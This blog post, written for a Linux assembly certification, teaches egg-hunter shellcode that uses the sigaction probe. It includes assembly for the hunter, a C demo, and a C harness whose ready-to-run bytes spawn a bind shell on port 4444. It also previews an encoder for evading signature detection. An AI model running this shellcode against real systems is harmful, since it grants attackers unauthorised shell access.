To define it in a single line, egg hunting is the process of reliably searching a process's address space for a given key (the egg).
Egg-hunt (Wikipedia)
This is another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process but cannot determine where in the process it will end up. Small egg-hunt shellcode is injected into the process at a predictable location and executed. This code then searches the process’s address space for the larger shellcode (the egg) and executes it.
In this blog post, we will create our own egghunter shellcode which locates a payload placed elsewhere in memory and executes it (here, the bind shell from the first post of the series). We will implement one of the methods from the amazing research done by Skape on "Safely Searching Process Virtual Address Space".
We will use the sigaction approach described in Skape's research. As seen in the man page reference below, on 32-bit Linux the syscall "sigaction" takes the following arguments:
EAX = 67
EBX = signum
ECX = *act
EDX = *oldact
The trick is that the kernel has to copy the act structure from the address in ECX before it can do anything with it. If that address is not mapped, the copy fails and the syscall returns -EFAULT to the caller instead of the process taking a SIGSEGV, so a single syscall validates a whole struct-sized region rather than a single byte. Two things are worth keeping in mind: the memory only has to be readable, not executable, and EBX and EDX are passed through untouched as signum and oldact, so the hunter inherits whatever they hold at entry (with a valid signal number in EBX the kernel will really install a handler from the bytes at ECX, and if it then has to write oldact to an unmapped EDX it returns EFAULT even for a readable page). I won't go any further into the details of the syscall as the research paper already covers it in great extent.

Below is the shellcode, which uses 0x50905090 as the key (egg) and hunts for it in the address space. The egg itself is the key written twice in a row (eight bytes), so the hunter, which contains the key only once in its own mov eax, never matches itself. Once both SCASD compares succeed, EDI points just past the egg and the flow is redirected to the actual payload.
global _start
section .text
_start:
verify_area:
or cx,0xfff ; set the low 12 bits: ECX now holds the last byte of the current 4 KiB page
hunt_addr:
inc ecx ; next candidate address (right after verify_area this is the start of the next page)
push 0x43 ; Syscall 67 - sigaction
pop eax
int 0x80 ; EBX = signum, ECX = act, EDX = oldact; the kernel tries to read act from ECX
cmp al,0xf2 ; Compare the low byte of the return value against -EFAULT (0xfffffff2)
jz verify_area ; EFAULT means the page at ECX is not mapped -> skip the whole page
mov eax,0x50905090 ; Move egg in eax for SCASD operation
mov edi,ecx ; EDI = candidate address; SCASD compares EAX with [EDI] and advances EDI by 4
scasd ; Compare first half of the egg
jnz hunt_addr ; If the egg does not match, loop incrementing the address
scasd ; Compare second half of the egg
jnz hunt_addr ; Loop again if no match
jmp edi ; EDI now points just past the 8-byte egg: jump to the payload
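To make the two halves of the technique concrete (the sigaction probe from the register description above and the probe-then-scan loop of the shellcode), here is a C re-implementation of the same hunter. This is an added example written for this page, not code from the post or from Skape's paper. It builds natively on x86-64 Linux by calling rt_sigaction (the 64-bit equivalent of syscall 67) through glibc's syscall() wrapper instead of int 0x80, and it passes signal number 0 so that nothing is ever installed: on readable memory the kernel copies the struct and then returns EINVAL for the bad signum, on unmapped memory the copy fails first and it returns EFAULT, which is exactly the condition the shellcode tests with cmp al,0xf2. Assumptions: the kernel's sigset_t is 8 bytes (x86 Linux, not glibc's 128-byte type), the probe window is the 32-byte kernel struct sigaction rather than the 16-byte old_sigaction, the four-page region with PROT_NONE guard pages and the "payload-bytes-go-here" string are constructed here for the demonstration, and the located payload is returned rather than jumped to.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Size of the kernel's sigset_t (_NSIG/8 on x86 Linux). glibc's sigset_t is
 * 128 bytes; rt_sigaction rejects any other size with EINVAL before it ever
 * touches 'act', so this value matters. Assumption: x86 Linux. */
#define KERNEL_SIGSET_SIZE 8

/* Ask the kernel whether it can read sizeof(struct sigaction) (32 bytes on
 * x86-64) at addr, the same way the shellcode does with syscall 67.
 * signum 0 is invalid, so on readable memory the call fails with EINVAL after
 * the copy_from_user already succeeded, and no handler is installed; on
 * unmapped memory the copy fails first and the kernel returns EFAULT. */
static int kernel_can_read(const void *addr)
{
    long r = syscall(SYS_rt_sigaction, 0, addr, NULL, KERNEL_SIGSET_SIZE);
    return !(r == -1 && errno == EFAULT);
}

/* Mirror of the shellcode's loop over [start, limit): skip a whole page when
 * the probe faults, otherwise compare the 8-byte egg (key twice, the two
 * SCASD instructions) and return the address right after it (the jmp edi).
 * Returns NULL when the egg is not found before limit. */
static const unsigned char *hunt_egg(uintptr_t start, uintptr_t limit, uint32_t key)
{
    const uintptr_t low = (uintptr_t)sysconf(_SC_PAGESIZE) - 1; /* 0xfff for 4 KiB pages */
    uintptr_t addr = start | low;            /* verify_area: last byte of start's page */

    while (addr + 1 < limit) {
        addr++;                              /* hunt_addr: inc ecx */
        if (!kernel_can_read((const void *)addr)) {
            addr |= low;                     /* EFAULT: jump to the end of this page */
            continue;
        }
        uint32_t w0, w1;                     /* the two SCASD compares */
        memcpy(&w0, (const void *)addr, sizeof w0);
        memcpy(&w1, (const void *)(addr + 4), sizeof w1);
        if (w0 == key && w1 == key)
            return (const unsigned char *)(addr + 8);
    }
    return NULL;
}

/* Constructed address-space slice: [guard][guard][egg + payload][guard].
 * Returns 1 when the probe classifies both page kinds correctly and the
 * hunter lands exactly on the payload, 0 on a mismatch, <0 on setup failure. */
int run_demo(void)
{
    const uint32_t key = 0x50905090;         /* same key as the shellcode */
    const size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    unsigned char *base = mmap(NULL, 4 * pg, PROT_NONE,
                               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return -1;
    unsigned char *data = base + 2 * pg;     /* only page 2 becomes readable */
    if (mprotect(data, pg, PROT_READ | PROT_WRITE) != 0)
        return -2;

    /* Constructed "injected buffer": key twice, then a stand-in payload. */
    static const char payload[] = "payload-bytes-go-here";
    unsigned char *egg_at = data + 100;
    memcpy(egg_at, &key, 4);                 /* little-endian: 90 50 90 50 */
    memcpy(egg_at + 4, &key, 4);
    memcpy(egg_at + 8, payload, sizeof payload);

    int ok = 1;
    ok &= (kernel_can_read(base) == 0);      /* guard page -> EFAULT */
    ok &= (kernel_can_read(data) == 1);      /* mapped page -> EINVAL, readable */
    const unsigned char *found = hunt_egg((uintptr_t)base, (uintptr_t)base + 4 * pg, key);
    ok &= (found == egg_at + 8);
    ok &= (found != NULL && memcmp(found, payload, sizeof payload) == 0);
    munmap(base, 4 * pg);
    return ok;
}

int main(void)
{
    int r = run_demo();
    printf("egg hunt demo: %s (%d)\n", r == 1 ? "payload located" : "failed", r);
    return r == 1 ? 0 : 1;
}
```

Note that the probe window is larger than the egg, so an egg sitting in the last 31 bytes of a readable page that borders an unmapped page is skipped; the 16-byte old_sigaction used by the 32-bit shellcode has the same property on a smaller scale. A real hunter also has no limit parameter: it keeps incrementing until the egg turns up or the address wraps.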
Now we generate the shellcode bytes from the above asm code using the cli-fu shown in the previous posts and use them in our C harness.
Below is our C harness, which contains the egghunter shellcode from above and the bind shell shellcode from the first post of the series. Do note how the key has been prepended twice to the actual shellcode.
// Author - badbit
// Egghunter shellcode spawning a bind shell on localhost:4444
#include <stdio.h>
#include <string.h>
// 30-byte egghunter assembled from the code above; it contains no null bytes.
char egghunter[] = "\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
// Key 0x50905090 written twice (little-endian: 90 50 90 50), followed by
// the bind shell shellcode from the first post of the series.
char shellcode[] =
"\x90\x50\x90\x50"
"\x90\x50\x90\x50"
"\x31\xc0\x31\xdb\x31\xc9\xb3\x01\x51\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc6\xb0\x66\x31\xdb\x53\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x02\xcd\x80\xb0\x66\x31\xdb\x53\x56\x89\xe1\xb3\x04\xcd\x80\xb0\x66\x31\xdb\x53\x53\x56\x89\xe1\xb3\x05\xcd\x80\x89\xc3\xb9\x02\x00\x00\x00\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc9\x89\xca\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";
int main(void)
{
    printf("[+] Shell bound to port 4444.\n");
    // sizeof rather than strlen: the bind shell contains null bytes
    // (mov ecx,2 = b9 02 00 00 00), which would cut strlen short.
    printf("[+] Original shellcode length : %zu\n", sizeof(shellcode) - 1 - 8);
    printf("[+] Length of egghunter : %zu\n\n\n", sizeof(egghunter) - 1);
    // Execute only the egghunter; it finds the egg in memory and jumps to the payload.
    int (*ret)() = (int(*)())egghunter;
    ret();
    return 0;
}
Compiling the above as a 32-bit binary with the stack marked as executable (gcc -m32 -z execstack egghunter.c -o egghunter; the arrays live in .data rather than on the stack, but on i386 an executable PT_GNU_STACK makes the kernel map all readable segments as executable too) and running it, we get the below output:

In the right window, we can see our payload successfully executing, and in the left one we can see that we are connected to our bind shell and successfully executing commands on the host.
Resources:
- The original research by Skape – http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
- Brilliant article on Egghunters (Windows) by HackSysTeam – https://www.exploit-db.com/docs/english/18482-egg-hunter—a-twist-in-buffer-overflow.pdf
That’s all for this blog post.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-14690
Egghunter shellcode Github Repo
In the next blog post, we will create our own Custom Encoder scheme which can be used to defeat signature based detection schemes.